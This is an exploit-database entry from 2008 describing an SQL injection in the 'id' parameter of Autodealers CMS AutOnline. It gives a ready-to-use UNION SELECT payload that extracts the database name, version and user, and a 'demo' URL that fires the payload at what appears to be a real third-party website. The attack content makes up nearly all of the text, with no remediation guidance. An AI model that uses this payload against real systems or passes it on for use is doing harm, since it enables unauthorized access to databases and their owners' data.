Autodealers CMS AutOnline (id) SQL Injection Vulnerability

2008-09-11T00:00:00
ID 1337DAY-ID-3648
Type zdt
Reporter ZoRLu
Modified 2008-09-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================================
Autodealers CMS AutOnline (id) SQL Injection Vulnerability
==========================================================



############################################################################################################
[+] Autodealers CMS AutOnline (id) SQL Injection Vulnerability
[+] Discovered By ZoRLu                  
############################################################################################################
[+]
[+]
[+]
[+]

   exploit:
http://localhost/script_path/index.php?page=detail&id=[SQL]

[+]
[+]
[+]
[+]

   [SQL]=
ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*

[+]
[+]
[+]
[+]   
[+]

   demo:
http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=detail&id=ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*

[+]
[+] 
[+]
[+] 
############################################################################################################




#  0day.today [2018-02-18]  #